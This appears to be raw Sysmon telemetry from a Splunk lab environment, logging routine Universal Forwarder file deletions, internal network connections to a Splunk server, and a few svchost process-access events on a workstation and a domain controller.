Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59098FD8972DCE433AA09B207C464A7D,SHA256=260DE8E60A7EE5BFEE1EF0E83AA9A100ACD4847E8D49594742F28FD90E5F3CD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245148Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:45.809{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1087E904BD0C79468531BD17AFFC0700,SHA256=D60E422B5136A77F7C47BA7A81EF8925FB2D02320ECF287092032AF405D66208,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245147Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:44.487{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64732-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245146Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:45.277{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0ACB3ABFA897E2468AB40A489960B0C2,SHA256=D552894061F2262873C2BB797D4D0813D91FE28CF0DCF3A2EC089047C895B17B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245145Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:45.277{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BFEE85AA0676BFDD56AEADAA098D1A8,SHA256=70764C4462C91E222F15110E5DF1121603AD57162C0B0D322451602A43C0181C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060585Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:46.884{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D60C896A4B0FD32CF0D2FFFA6A86BE4,SHA256=7FF7F50FBDE528F5FA17F5AAB4A5CF46D35F6289F767EEE7C83D0290F04B58D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245149Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:46.840{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88F42989D9C5C48B202113DB00BD3C5D,SHA256=14EE048E56CF573787BC27120DF17F619CE0C6BC85976D124EAF6ACE1FA9E4B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245150Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:47.840{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B890A928A7E503B11E18EFF5F96685C1,SHA256=D94E90AD5CD77980BB639BEAC0D13F9C02DBB489D6ACA12FA8A719A86C096E49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060586Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:48.260{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FC5D4A07B6FEDC89AC493594FBEF2A9,SHA256=8759BA64526F81A414B44F004F316ABCEF2932E5C72842D12C1743A73E3BF819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245151Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:48.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18B43559C5604320C7D639EFBCAF21D1,SHA256=489EF640F60C20AFE7BF4CE722D203297D593F1F1F529A74BFD151AD2D36BF2C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060588Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:47.067{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54744-false10.0.1.12-8000- 23542300x80000000000000001060587Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:49.619{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=293B31387A4B5A487B87EF519A52B1C6,SHA256=DBE2D403F98824BCD713A9BD094195B7A28D2AB5F1371D5773B96FDAB01CA545,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245152Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:49.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EE4604CA316A2225BC14A2C771F6A4B,SHA256=6A99BC25D6DAF55415338D57B11647293CB7B5D981ABFE46D319CB7C274A646A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060591Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:50.979{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=005A917DDE5099447CCD24BC673F2F72,SHA256=04E8C64922105C72BED0048927C10516C8431540B90312D724128BBBC4D900FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060590Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:50.229{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4F98-6063-D400-00000000AF01}3720C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001060589Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:50.182{7F8C56E7-4E3C-6063-1100-00000000AF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=CA16EB5729BA31DADD969CC44AB76AE1,SHA256=DFD69960C710EDB60AF5634106BC7466A109330327AA3CE0CDC9388EB85A8E2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245153Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:50.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A72E0542B1D5D5AEE90BF555103ED4A4,SHA256=43C087B16D3C360DAA674A91B399033882707E696854AF1DF41FB26FED7FD075,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060593Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:51.651{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4DB0AA5FEABDD9A04FEEB1EB78DE2B66,SHA256=BF3BA5D39C429A9BCA0DFE23C6540B67E0DC79B2468CDC8A2CC327157931CFC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060592Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:51.010{7F8C56E7-4E4C-6063-3300-00000000AF01}2364NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245157Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:51.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44928545F268395B85E82203B86D52E2,SHA256=0414F38C39669A20AE82564FCFA5DBBEFDC80856C8AD0FEA8684C656E973216E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245156Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:50.519{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64733-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245155Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:51.230{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81FBCADA6046C82540B047D21F109AFF,SHA256=9D00B60570B752E7E76426E72862ADCFAD648D745984BFA8D887F5FF0AE30052,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245154Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:51.230{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0ACB3ABFA897E2468AB40A489960B0C2,SHA256=D552894061F2262873C2BB797D4D0813D91FE28CF0DCF3A2EC089047C895B17B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060595Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:49.848{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54745-false10.0.1.12-8089- 23542300x80000000000000001060594Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:52.338{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCE0720B7C8764B4705B6F6A8BE0C732,SHA256=7179865828566F7360AE5D1A5D8B9E1DE4355DDA842A20DD6A36F57159E1C5A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245162Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:52.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D9292EC95B418BF4FE191E5C3420B8C,SHA256=EA8CFB1854E612F65A5243495246303BF25E90199B5B212D2C6E189D8024DD30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245161Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:52.652{CB4067E1-304B-6062-1200-00000000AF01}1008NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=1F514599832E76702B5F1248C69C12DE,SHA256=386000390926FE1EE89C8959757B59F85D666D42BD0DEE2B106EB3A1D58F6E96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245160Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:52.184{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304B-6062-1600-00000000AF01}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245159Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:52.184{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304B-6062-1600-00000000AF01}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245158Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:52.184{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304B-6062-1600-00000000AF01}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001060596Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:53.729{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78DC7B43DEE529CBECA34FD55F58B15A,SHA256=81B69C88EE59949DD652A28DB075E867292A9C4C503EBE6DBCF6A4E09C94718C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245164Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:53.934{CB4067E1-30AF-6062-9800-00000000AF01}2672NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245163Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:53.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6507F6C8CAB637DE10A816D61B119DDC,SHA256=93B39A4D0F8FC4FBA03A9D6F9B74A18F89AF0B99E9034F446A87B2CAD9236A6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245166Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:54.934{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81FBCADA6046C82540B047D21F109AFF,SHA256=9D00B60570B752E7E76426E72862ADCFAD648D745984BFA8D887F5FF0AE30052,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245165Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:54.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C32EF40F2D9953F27C1DBF979D5ECE7,SHA256=ACC9BD66679BCA911A24DD46CB19470D03C6FC752C1FD372FFB7CED612693E6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060597Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:55.104{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C46A3B06C8C7D73977A7A9584DAF740,SHA256=95EA4E6E47A1A28BEB8A8A908F8CD57EF07B2110AEFECD26388F6C836E015E22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245168Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:55.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F5987892909FD3EAE13E2E40357118B,SHA256=6FD26B39B79D5680BB62BADBCBCFE3F6E2E75120553CEB7FF9197C38ABFD7305,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245167Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:54.347{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64734-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x80000000000000001060599Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:56.464{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50EB033187AE5C3C68C4D253D43E1D16,SHA256=BA97F5FBFCD2666C1687891A60393482DA3C7F28C9687EE4022B83EA9D36C9B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060598Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:52.942{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54746-false10.0.1.12-8000- 23542300x8000000000000000245169Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:56.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CEDA4A620290DAB8D641E24DE9004BD,SHA256=1462B81A431CD1B88BBEB976877D9B47E4D840CFF72B03EA54EA0BA868B5D8F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060600Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:57.824{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00CCEDCED8A47D9F2D0228FAA050FCC7,SHA256=EA9A7D0FFC8B675FF97FDE0F85298E06D2119597E182D54BB997AE96F1F4A27B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245171Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:57.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7911306F130DD6C389B7B1FB70A6ADD2,SHA256=E215C20C63A6157D47778F4B8E9F2B51544DA25D6F03CB5CA9459DCFD9F64F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245170Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:57.105{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8E88BCDCAFE4022754430AD8A9480FE,SHA256=1B1FE09FFCCF5E8E94A7A79821EEA105D9114C12E12564C7BE179AF86B2B5093,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245173Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:58.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4636CEC88D27E8F9BADA77D08C8B3D70,SHA256=D3A0547908D08D957066C4DCB2B447D6FE0B70F787F0A204BC9EDBCC021B5118,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245172Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:56.534{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64735-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001060601Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:25:59.183{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=314B9FA24ADE40DCBAE0278B2283AD74,SHA256=9BCE57A3164EB20BE55D87B3293B24128BAEE6E1D2FDB062290B0C3159B316F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245174Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:25:59.871{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73E0B06C24333108E743519270DCA92D,SHA256=F663D6B1984950D91831FC2395BFAF4AC11D461F8295BEA986E1AB2790D4F361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060603Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:00.543{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A31D411444D9E563698E38A5F093A350,SHA256=7BB2EC73F43EEFE305155B719F0D5057165B044B01BC11956E14C1C6CB92DB91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060602Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:00.543{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 